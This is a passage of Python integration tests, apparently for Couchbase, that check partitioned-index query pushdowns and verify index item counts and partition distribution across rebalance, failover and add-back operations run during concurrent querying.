explain_query3 = "EXPLAIN select meta().id from default where name is not missing order by name"
results = self.n1ql_helper.run_cbq_query(query=explain_query3,
server=self.n1ql_node)
self.log.info("Explain plan for query 3 : {0}".format(results))
_, _, _, _, sorting_pushdown = self.validate_query_plan(
plan=results["results"][0]["plan"],
index_name="partitioned_idx1",
index_order_list=[{'keypos': 0}])
self.assertTrue(sorting_pushdown,
"Operators not pushed down to indexer")
def test_indexer_pushdowns_sorting_desc(self):
self._load_emp_dataset(end=self.num_items)
# Create Partitioned indexes
create_partitioned_index_query = "CREATE INDEX partitioned_idx1 ON default(name,dept,salary desc) partition by hash(meta().id) USING GSI with {{'num_partition':{0}}};".format(
self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_partitioned_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
explain_query1 = "EXPLAIN select name,dept,salary from default where name is not missing order by name,dept,salary desc"
results = self.n1ql_helper.run_cbq_query(query=explain_query1,
server=self.n1ql_node)
self.log.info("Explain plan for query 1 : {0}".format(results))
_, _, _, _, sorting_pushdown = self.validate_query_plan(
plan=results["results"][0]["plan"],
index_name="partitioned_idx1",
index_order_list=[{'keypos': 0}, {'keypos': 1},
{"desc": True, 'keypos': 2}])
self.assertTrue(sorting_pushdown,
"Operators not pushed down to indexer")
def test_multiple_operator_indexer_pushdowns(self):
self._load_emp_dataset(end=self.num_items)
# Create Partitioned indexes
create_partitioned_index_query = "CREATE INDEX partitioned_idx1 ON default(name,dept,salary) partition by hash(meta().id) USING GSI with {{'num_partition':{0}}};".format(
self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_partitioned_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
explain_query1 = "EXPLAIN select name from default where name is not missing order by name OFFSET 10 LIMIT 10"
results = self.n1ql_helper.run_cbq_query(query=explain_query1,
server=self.n1ql_node)
self.log.info("Explain plan for query 1 : {0}".format(results))
scan_pushdown, limit_pushdown, offset_pushdown, projection_pushdown, sorting_pushdown = self.validate_query_plan(
plan=results["results"][0]["plan"], index_name="partitioned_idx1",
num_spans=1, offset=10, limit=10, index_order_list=[{'keypos': 0}],
projection_list=[0])
self.assertTrue(
scan_pushdown & limit_pushdown & offset_pushdown & projection_pushdown & sorting_pushdown,
"Operators not pushed down to indexer")
def test_aggregate_indexer_pushdowns_group_by_leading_keys(self):
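        """Verify via EXPLAIN that grouping and aggregation on the leading
        index key are pushed down to the indexer (index_group_aggs appears in
        the plan)."""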
self._load_emp_dataset(end=self.num_items)
# Create Partitioned indexes
create_partitioned_index_query = "CREATE INDEX partitioned_idx1 ON default(dept,name,salary) partition by hash(meta().id) USING GSI with {{'num_partition':{0}}};".format(
self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_partitioned_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
explain_query1 = "EXPLAIN select dept,count(*) from default where dept is not missing GROUP BY dept"
results = self.n1ql_helper.run_cbq_query(query=explain_query1,
server=self.n1ql_node)
self.log.info("Explain plan for query 1 : {0}".format(results))
agg_pushdown = False
if "index_group_aggs" in str(results):
agg_pushdown = True
self.assertTrue(agg_pushdown, "Operators not pushed down to indexer")
explain_query2 = "EXPLAIN select dept,sum(salary), min(salary), max(salary), avg(salary) from default where dept is not missing GROUP BY dept"
results = self.n1ql_helper.run_cbq_query(query=explain_query2,
server=self.n1ql_node)
self.log.info("Explain plan for query 2 : {0}".format(results))
agg_pushdown = False
if "index_group_aggs" in str(results):
agg_pushdown = True
self.assertTrue(agg_pushdown, "Operators not pushed down to indexer")
def test_aggregate_indexer_pushdowns_group_by_partition_keys(self):
self._load_emp_dataset(end=self.num_items)
# Create Partitioned indexes
create_partitioned_index_query = "CREATE INDEX partitioned_idx1 ON default(dept,name,salary) partition by hash(LOWER(name),UPPER(dept)) USING GSI with {{'num_partition':{0}}};".format(
self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_partitioned_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
explain_query1 = "EXPLAIN select name,dept,count(*) from default where dept is not missing GROUP BY name,dept"
results = self.n1ql_helper.run_cbq_query(query=explain_query1,
server=self.n1ql_node)
self.log.info("Explain plan for query 1 : {0}".format(results))
agg_pushdown = False
if "index_group_aggs" in str(results):
agg_pushdown = True
self.assertTrue(agg_pushdown, "Operators not pushed down to indexer")
explain_query2 = "EXPLAIN select dept,sum(salary), min(salary), max(salary), avg(salary) from default where dept is not missing GROUP BY dept"
results = self.n1ql_helper.run_cbq_query(query=explain_query2,
server=self.n1ql_node)
self.log.info("Explain plan for query 2 : {0}".format(results))
agg_pushdown = False
if "index_group_aggs" in str(results):
agg_pushdown = True
self.assertTrue(agg_pushdown, "Operators not pushed down to indexer")
def test_aggregate_indexer_pushdowns_partition_keys_index_keys(self):
self._load_emp_dataset(end=self.num_items)
# Create Partitioned indexes
create_partitioned_index_query = "CREATE INDEX partitioned_idx1 ON default(dept,name,salary) partition by hash(LOWER(dept)) USING GSI with {{'num_partition':{0}}};".format(
self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_partitioned_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
explain_query1 = "EXPLAIN select salary,count(*) from default where dept is not missing GROUP BY salary"
results = self.n1ql_helper.run_cbq_query(query=explain_query1,
server=self.n1ql_node)
self.log.info("Explain plan for query 1 : {0}".format(results))
agg_pushdown = False
if "index_group_aggs" in str(results):
agg_pushdown = True
self.assertTrue(agg_pushdown, "Operators not pushed down to indexer")
explain_query2 = "EXPLAIN select dept,sum(salary), min(salary), max(salary), avg(salary) from default where dept is not missing GROUP BY dept"
results = self.n1ql_helper.run_cbq_query(query=explain_query2,
server=self.n1ql_node)
self.log.info("Explain plan for query 2 : {0}".format(results))
agg_pushdown = False
if "index_group_aggs" in str(results):
agg_pushdown = True
self.assertTrue(agg_pushdown, "Operators not pushed down to indexer")
def test_aggregate_indexer_pushdowns_groupby_trailing_keys_partition_keys(
self):
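        """Verify aggregate pushdown when the GROUP BY key is a trailing index
        key that is also the partition key (partition by hash(salary))."""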
self._load_emp_dataset(end=self.num_items)
# Create Partitioned indexes
create_partitioned_index_query = "CREATE INDEX partitioned_idx1 ON default(dept,name,salary) partition by hash(salary) USING GSI with {{'num_partition':{0}}};".format(
self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_partitioned_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
explain_query1 = "EXPLAIN select salary,count(*) from default where dept is not missing GROUP BY salary"
results = self.n1ql_helper.run_cbq_query(query=explain_query1,
server=self.n1ql_node)
self.log.info("Explain plan for query 1 : {0}".format(results))
agg_pushdown = False
if "index_group_aggs" in str(results):
agg_pushdown = True
self.assertTrue(agg_pushdown, "Operators not pushed down to indexer")
def test_aggregate_indexer_pushdowns_groupby_trailing_keys_not_partition_keys(
self):
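        """Verify aggregate pushdown when the GROUP BY key is a trailing index
        key that is not the partition key (partition by hash(dept))."""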
self._load_emp_dataset(end=self.num_items)
# Create Partitioned indexes
create_partitioned_index_query = "CREATE INDEX partitioned_idx1 ON default(dept,name,salary) partition by hash(dept) USING GSI with {{'num_partition':{0}}};".format(
self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_partitioned_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
explain_query1 = "EXPLAIN select salary,count(*) from default where dept is not missing GROUP BY salary"
results = self.n1ql_helper.run_cbq_query(query=explain_query1,
server=self.n1ql_node)
self.log.info("Explain plan for query 1 : {0}".format(results))
agg_pushdown = False
if "index_group_aggs" in str(results):
agg_pushdown = True
self.assertTrue(agg_pushdown, "Operators not pushed down to indexer")
def test_rebalance_out_with_partitioned_indexes_with_concurrent_querying(
self):
self._load_emp_dataset(end=self.num_items)
with_statement = "with {{'num_partition':{0}".format(self.num_index_partitions)
if self.num_index_replicas > 0:
with_statement += ", 'num_replica':{0}".format(self.num_index_replicas)
if self.defer_build:
with_statement += ", 'defer_build': true"
with_statement += " }"
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) " + with_statement
create_primary_index_statement = "CREATE PRIMARY INDEX pidx1 on default partition by hash(meta().id) " + with_statement
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(
query=create_primary_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.sleep(30)
node_out = self.servers[self.node_out]
node_out_str = node_out.ip + ":" + str(node_out.port)
# Get Index Names
index_names = ["idx1", "pidx1"]
if self.num_index_replicas > 0:
for i in range(1, self.num_index_replicas + 1):
index_names.append("idx1 (replica {0})".format(str(i)))
index_names.append("pidx1 (replica {0})".format(str(i)))
self.log.info(index_names)
# Get Stats and index partition map before rebalance
index_data_before = {}
for index in index_names:
_, total_item_count_before, _ = self.get_stats_for_partitioned_indexes(
index_name=index)
index_data_before[index] = {}
index_data_before[index]["item_count"] = total_item_count_before
index_data_before[index][
"index_metadata"] = self.rest.get_indexer_metadata()
# start querying
query = "select name,dept,salary from default where name is not missing and dept='HR' and salary > 120000;"
t1 = Thread(target=self._run_queries, args=(query, 30,))
t1.start()
        # rebalance out an indexer node when querying is in progress
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [node_out])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
t1.join()
self.sleep(30)
# Get Stats and index partition map after rebalance
node_list = copy.deepcopy(self.node_list)
node_list.remove(node_out_str)
self.log.info(node_list)
index_data_after = {}
for index in index_names:
self.index_servers = self.get_nodes_from_services_map(
service_type="index", get_all_nodes=True)
_, total_item_count_after, _ = self.get_stats_for_partitioned_indexes(
index_name=index, node_list=node_list)
index_data_after[index] = {}
index_data_after[index]["item_count"] = total_item_count_after
index_data_after[index][
"index_metadata"] = RestConnection(
self.index_servers[0]).get_indexer_metadata()
for index in index_names:
# Validate index item count before and after
self.assertEqual(index_data_before[index]["item_count"],
index_data_after[index]["item_count"],
"Item count in index do not match after cluster ops.")
# Validate host list, partition count and partition distribution
self.assertTrue(
self.validate_partition_distribution_after_cluster_ops(
index, index_data_before[index]["index_metadata"],
index_data_after[index]["index_metadata"], [],
[node_out]),
"Partition distribution post cluster ops has some issues")
def test_rebalance_out_with_partitioned_indexes_with_concurrent_querying_stop_and_resume(
self):
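        """Stop a rebalance-out of an indexer node mid-way (optionally resuming
        it after a delay) while queries are running, then validate index item
        counts and partition distribution."""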
resume = self.input.param("resume_stopped_rebalance", False)
resume_delay = self.input.param("resume_delay", 0)
self._load_emp_dataset(end=self.num_items)
# Create partitioned index
if self.num_index_replicas > 0:
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_replica':{0}, 'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
create_primary_index_statement = "CREATE PRIMARY INDEX pidx1 on default partition by hash(meta().id) with {{'num_replica':{0}, 'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
else:
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_partition':{0}}}".format(
self.num_index_partitions)
create_primary_index_statement = "CREATE PRIMARY INDEX pidx1 on default partition by hash(meta().id) with {{'num_partition':{0}}}".format(
self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(
query=create_primary_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.sleep(30)
node_out = self.servers[self.node_out]
node_out_str = node_out.ip + ":" + str(node_out.port)
# Get Index Names
index_names = ["idx1", "pidx1"]
if self.num_index_replicas > 0:
for i in range(1, self.num_index_replicas + 1):
index_names.append("idx1 (replica {0})".format(str(i)))
index_names.append("pidx1 (replica {0})".format(str(i)))
self.log.info(index_names)
# Get Stats and index partition map before rebalance
index_data_before = {}
for index in index_names:
_, total_item_count_before, _ = self.get_stats_for_partitioned_indexes(
index_name=index)
index_data_before[index] = {}
index_data_before[index]["item_count"] = total_item_count_before
index_data_before[index][
"index_metadata"] = self.rest.get_indexer_metadata()
# start querying
query = "select name,dept,salary from default where name is not missing and dept='HR' and salary > 120000;"
t1 = Thread(target=self._run_queries, args=(query, 30,))
t1.start()
        # rebalance out an indexer node when querying is in progress
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [node_out])
stopped = RestConnection(self.master).stop_rebalance(
wait_timeout=self.wait_timeout // 3)
self.assertTrue(stopped, msg="unable to stop rebalance")
rebalance.result()
if resume:
if resume_delay > 0:
self.sleep(resume_delay,
"Sleep for some time before resume stopped rebalance")
rebalance = self.cluster.async_rebalance(
self.servers[:self.nodes_init],
[], [node_out])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached,
"rebalance failed, stuck or did not complete")
rebalance.result()
t1.join()
self.sleep(30)
# Get Stats and index partition map after rebalance
node_list = copy.deepcopy(self.node_list)
node_list.remove(node_out_str)
self.log.info(node_list)
index_data_after = {}
for index in index_names:
self.index_servers = self.get_nodes_from_services_map(
service_type="index", get_all_nodes=True)
_, total_item_count_after, _ = self.get_stats_for_partitioned_indexes(
index_name=index, node_list=node_list)
index_data_after[index] = {}
index_data_after[index]["item_count"] = total_item_count_after
index_data_after[index][
"index_metadata"] = RestConnection(self.index_servers[0]).get_indexer_metadata()
for index in index_names:
# Validate index item count before and after
self.assertEqual(index_data_before[index]["item_count"],
index_data_after[index]["item_count"],
"Item count in index do not match after cluster ops.")
# Validate host list, partition count and partition distribution
self.assertTrue(
self.validate_partition_distribution_after_cluster_ops(
index, index_data_before[index]["index_metadata"],
index_data_after[index]["index_metadata"], [],
[node_out]),
"Partition distribution post cluster ops has some issues")
def test_rebalance_in_with_partitioned_indexes_with_concurrent_querying(
self):
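        """Rebalance in an indexer node while queries are running and validate
        that index item counts and partition distribution are intact."""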
self._load_emp_dataset(end=self.num_items)
with_statement = "with {{'num_partition':{0}".format(
self.num_index_partitions)
if self.num_index_replicas > 0:
with_statement += ", 'num_replica':{0}".format(
self.num_index_replicas)
if self.defer_build:
with_statement += ", 'defer_build': true"
with_statement += " }"
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) " + with_statement
create_primary_index_statement = "CREATE PRIMARY INDEX pidx1 on default partition by hash(meta().id) " + with_statement
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(
query=create_primary_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.sleep(30)
node_in = self.servers[self.nodes_init]
node_in_str = node_in.ip + ":" + str(node_in.port)
services_in = ["index"]
# Get Index Names
index_names = ["idx1", "pidx1"]
if self.num_index_replicas > 0:
for i in range(1, self.num_index_replicas + 1):
index_names.append("idx1 (replica {0})".format(str(i)))
index_names.append("pidx1 (replica {0})".format(str(i)))
self.log.info(index_names)
# Get Stats and index partition map before rebalance
index_data_before = {}
for index in index_names:
_, total_item_count_before, _ = self.get_stats_for_partitioned_indexes(
index_name=index)
index_data_before[index] = {}
index_data_before[index]["item_count"] = total_item_count_before
index_data_before[index][
"index_metadata"] = self.rest.get_indexer_metadata()
# start querying
query = "select name,dept,salary from default where name is not missing and dept='HR' and salary > 120000;"
t1 = Thread(target=self._run_queries, args=(query, 30,))
t1.start()
        # rebalance in an indexer node when querying is in progress
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[node_in], [],
services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
t1.join()
self.sleep(30)
# Get Stats and index partition map after rebalance
node_list = copy.deepcopy(self.node_list)
node_list.append(node_in_str)
self.log.info(node_list)
index_data_after = {}
for index in index_names:
self.index_servers = self.get_nodes_from_services_map(
service_type="index", get_all_nodes=True)
_, total_item_count_after, _ = self.get_stats_for_partitioned_indexes(
index_name=index, node_list=node_list)
index_data_after[index] = {}
index_data_after[index]["item_count"] = total_item_count_after
index_data_after[index][
"index_metadata"] = RestConnection(self.index_servers[0]).get_indexer_metadata()
for index in index_names:
# Validate index item count before and after
self.assertEqual(index_data_before[index]["item_count"],
index_data_after[index]["item_count"],
"Item count in index do not match after cluster ops.")
# Validate host list, partition count and partition distribution
self.assertTrue(
self.validate_partition_distribution_after_cluster_ops(
index, index_data_before[index]["index_metadata"],
index_data_after[index]["index_metadata"], [node_in],
[]),
"Partition distribution post cluster ops has some issues")
def test_swap_rebalance_with_partitioned_indexes_with_concurrent_querying(
self):
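        """Swap rebalance an indexer node while queries are running and validate
        that index item counts and partition distribution are intact."""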
self._load_emp_dataset(end=self.num_items)
with_statement = "with {{'num_partition':{0}".format(
self.num_index_partitions)
if self.num_index_replicas > 0:
with_statement += ", 'num_replica':{0}".format(
self.num_index_replicas)
if self.defer_build:
with_statement += ", 'defer_build': true"
with_statement += " }"
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) " + with_statement
create_primary_index_statement = "CREATE PRIMARY INDEX pidx1 on default partition by hash(meta().id) " + with_statement
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(
query=create_primary_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.sleep(30)
node_out = self.servers[self.node_out]
node_out_str = node_out.ip + ":" + str(node_out.port)
node_in = self.servers[self.nodes_init]
node_in_str = node_in.ip + ":" + str(node_in.port)
services_in = ["index"]
# Get Index Names
index_names = ["idx1", "pidx1"]
if self.num_index_replicas > 0:
for i in range(1, self.num_index_replicas + 1):
index_names.append("idx1 (replica {0})".format(str(i)))
index_names.append("pidx1 (replica {0})".format(str(i)))
self.log.info(index_names)
# Get Stats and index partition map before rebalance
index_data_before = {}
for index in index_names:
_, total_item_count_before, _ = self.get_stats_for_partitioned_indexes(
index_name=index)
index_data_before[index] = {}
index_data_before[index]["item_count"] = total_item_count_before
index_data_before[index][
"index_metadata"] = self.rest.get_indexer_metadata()
try:
# start querying
query = "select name,dept,salary from default where name is not missing and dept='HR' and salary > 120000;"
t1 = Thread(target=self._run_queries, args=(query, 30,))
t1.start()
            # swap rebalance an indexer node when querying is in progress
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[node_in], [node_out],
services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
t1.join()
except Exception as ex:
self.log.info(str(ex))
self.sleep(30)
# Get Stats and index partition map after rebalance
node_list = copy.deepcopy(self.node_list)
node_list.append(node_in_str)
node_list.remove(node_out_str)
index_data_after = {}
for index in index_names:
self.index_servers = self.get_nodes_from_services_map(
service_type="index", get_all_nodes=True)
_, total_item_count_after, _ = self.get_stats_for_partitioned_indexes(
index_name=index, node_list=node_list)
index_data_after[index] = {}
index_data_after[index]["item_count"] = total_item_count_after
index_data_after[index][
"index_metadata"] = RestConnection(self.index_servers[0]).get_indexer_metadata()
for index in index_names:
# Validate index item count before and after
self.assertEqual(index_data_before[index]["item_count"],
index_data_after[index]["item_count"],
"Item count in index do not match after cluster ops.")
# Validate host list, partition count and partition distribution
self.assertTrue(
self.validate_partition_distribution_after_cluster_ops(
index, index_data_before[index]["index_metadata"],
index_data_after[index]["index_metadata"], [node_in],
[node_out]),
"Partition distribution post cluster ops has some issues")
def test_failover_with_partitioned_indexes_with_concurrent_querying(
self):
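        """Failover and rebalance out an indexer node while queries are running,
        then validate index item counts and partition distribution."""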
self._load_emp_dataset(end=self.num_items)
# Create partitioned index
if self.num_index_replicas > 0:
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_replica':{0}, 'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
create_primary_index_statement = "CREATE PRIMARY INDEX pidx1 on default partition by hash(meta().id) with {{'num_replica':{0}, 'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
else:
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
create_primary_index_statement = "CREATE PRIMARY INDEX pidx1 on default partition by hash(meta().id) with {{'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(
query=create_primary_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.sleep(30)
node_out = self.servers[self.node_out]
node_out_str = node_out.ip + ":" + str(node_out.port)
# Get Index Names
index_names = ["idx1", "pidx1"]
if self.num_index_replicas > 0:
for i in range(1, self.num_index_replicas + 1):
index_names.append("idx1 (replica {0})".format(str(i)))
index_names.append("pidx1 (replica {0})".format(str(i)))
self.log.info(index_names)
# Get Stats and index partition map before rebalance
index_data_before = {}
for index in index_names:
_, total_item_count_before, _ = self.get_stats_for_partitioned_indexes(
index_name=index)
index_data_before[index] = {}
index_data_before[index]["item_count"] = total_item_count_before
index_data_before[index][
"index_metadata"] = self.rest.get_indexer_metadata()
# start querying
query = "select name,dept,salary from default where name is not missing and dept='HR' and salary > 120000;"
t1 = Thread(target=self._run_queries, args=(query, 30,))
t1.start()
        # failover and rebalance out an indexer node when querying is in progress
failover_task = self.cluster.async_failover(
self.servers[:self.nodes_init],
[node_out],
self.graceful, wait_for_pending=180)
failover_task.result()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [node_out])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
t1.join()
self.sleep(30)
# Get Stats and index partition map after rebalance
node_list = copy.deepcopy(self.node_list)
node_list.remove(node_out_str)
self.log.info(node_list)
index_data_after = {}
for index in index_names:
self.index_servers = self.get_nodes_from_services_map(
service_type="index", get_all_nodes=True)
_, total_item_count_after, _ = self.get_stats_for_partitioned_indexes(
index_name=index, node_list=node_list)
index_data_after[index] = {}
index_data_after[index]["item_count"] = total_item_count_after
index_data_after[index][
"index_metadata"] = RestConnection(self.index_servers[0]).get_indexer_metadata()
for index in index_names:
# Validate index item count before and after
self.assertEqual(index_data_before[index]["item_count"],
index_data_after[index]["item_count"],
"Item count in index do not match after cluster ops.")
# Validate host list, partition count and partition distribution
self.assertTrue(
self.validate_partition_distribution_after_cluster_ops(
index, index_data_before[index]["index_metadata"],
index_data_after[index]["index_metadata"], [],
[node_out]),
"Partition distribution post cluster ops has some issues")
def test_failover_addback_with_partitioned_indexes_with_concurrent_querying(
self):
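        """Failover an indexer node and add it back while queries are running,
        then validate index item counts and partition distribution."""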
self._load_emp_dataset(end=self.num_items)
# Create partitioned index
if self.num_index_replicas > 0:
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_replica':{0}, 'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
create_primary_index_statement = "CREATE PRIMARY INDEX pidx1 on default partition by hash(meta().id) with {{'num_replica':{0}, 'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
else:
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
create_primary_index_statement = "CREATE PRIMARY INDEX pidx1 on default partition by hash(meta().id) with {{'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(
query=create_primary_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.sleep(30)
node_out = self.servers[self.node_out]
node_out_str = node_out.ip + ":" + str(node_out.port)
# Get Index Names
index_names = ["idx1", "pidx1"]
if self.num_index_replicas > 0:
for i in range(1, self.num_index_replicas + 1):
index_names.append("idx1 (replica {0})".format(str(i)))
index_names.append("pidx1 (replica {0})".format(str(i)))
self.log.info(index_names)
# Get Stats and index partition map before rebalance
index_data_before = {}
for index in index_names:
_, total_item_count_before, _ = self.get_stats_for_partitioned_indexes(
index_name=index)
index_data_before[index] = {}
index_data_before[index]["item_count"] = total_item_count_before
index_data_before[index][
"index_metadata"] = self.rest.get_indexer_metadata()
# start querying
query = "select name,dept,salary from default where name is not missing and dept='HR' and salary > 120000;"
t1 = Thread(target=self._run_queries, args=(query, 30,))
t1.start()
        # failover an indexer node and add it back when querying is in progress
nodes_all = self.rest.node_statuses()
for node in nodes_all:
if node.ip == node_out.ip:
break
failover_task = self.cluster.async_failover(
self.servers[:self.nodes_init],
[node_out],
self.graceful, wait_for_pending=180)
failover_task.result()
self.rest.set_recovery_type(node.id, self.recovery_type)
self.rest.add_back_node(node.id)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
t1.join()
self.sleep(30)
# Get Stats and index partition map after rebalance
index_data_after = {}
for index in index_names:
self.index_servers = self.get_nodes_from_services_map(
service_type="index", get_all_nodes=True)
_, total_item_count_after, _ = self.get_stats_for_partitioned_indexes(
index_name=index)
index_data_after[index] = {}
index_data_after[index]["item_count"] = total_item_count_after
index_data_after[index][
"index_metadata"] = RestConnection(self.index_servers[0]).get_indexer_metadata()
for index in index_names:
# Validate index item count before and after
self.assertEqual(index_data_before[index]["item_count"],
index_data_after[index]["item_count"],
"Item count in index do not match after cluster ops.")
# Validate host list, partition count and partition distribution
self.assertTrue(
self.validate_partition_distribution_after_cluster_ops(
index, index_data_before[index]["index_metadata"],
index_data_after[index]["index_metadata"], [],
[]),
"Partition distribution post cluster ops has some issues")
def test_kv_rebalance_out_with_partitioned_indexes_with_concurrent_querying(
self):
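        """Rebalance out a kv node while queries are running and validate that
        index item counts and partition distribution are unaffected."""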
self._load_emp_dataset(end=self.num_items)
# Create partitioned index
if self.num_index_replicas > 0:
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_replica':{0}, 'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
create_primary_index_statement = "CREATE PRIMARY INDEX pidx1 on default partition by hash(meta().id) with {{'num_replica':{0}, 'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
else:
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
create_primary_index_statement = "CREATE PRIMARY INDEX pidx1 on default partition by hash(meta().id) with {{'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(
query=create_primary_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.sleep(30)
node_out = self.servers[self.node_out]
node_out_str = node_out.ip + ":" + str(node_out.port)
# Get Index Names
index_names = ["idx1", "pidx1"]
if self.num_index_replicas > 0:
for i in range(1, self.num_index_replicas + 1):
index_names.append("idx1 (replica {0})".format(str(i)))
index_names.append("pidx1 (replica {0})".format(str(i)))
self.log.info(index_names)
# Get Stats and index partition map before rebalance
index_data_before = {}
for index in index_names:
_, total_item_count_before, _ = self.get_stats_for_partitioned_indexes(
index_name=index)
index_data_before[index] = {}
index_data_before[index]["item_count"] = total_item_count_before
index_data_before[index][
"index_metadata"] = self.rest.get_indexer_metadata()
# start querying
query = "select name,dept,salary from default where name is not missing and dept='HR' and salary > 120000;"
t1 = Thread(target=self._run_queries, args=(query, 30,))
t1.start()
        # rebalance out a kv node when querying is in progress
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [node_out])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
t1.join()
self.sleep(30)
# Get Stats and index partition map after rebalance
index_data_after = {}
for index in index_names:
self.index_servers = self.get_nodes_from_services_map(
service_type="index", get_all_nodes=True)
_, total_item_count_after, _ = self.get_stats_for_partitioned_indexes(
index_name=index)
index_data_after[index] = {}
index_data_after[index]["item_count"] = total_item_count_after
index_data_after[index][
"index_metadata"] = RestConnection(self.index_servers[0]).get_indexer_metadata()
for index in index_names:
# Validate index item count before and after
self.assertEqual(index_data_before[index]["item_count"],
index_data_after[index]["item_count"],
"Item count in index do not match after cluster ops.")
# Validate host list, partition count and partition distribution
self.assertTrue(
self.validate_partition_distribution_after_cluster_ops(
index, index_data_before[index]["index_metadata"],
index_data_after[index]["index_metadata"], [],
[]),
"Partition distribution post cluster ops has some issues")
def test_rebalance_out_with_replica_partitioned_indexes_partition_loss(
self):
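        """Rebalance out an indexer node hosting a replicated partitioned index
        and verify that all partitions remain available and the total item
        count still matches the bucket item count."""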
self._load_emp_dataset(end=self.num_items)
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_replica':{0}, 'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
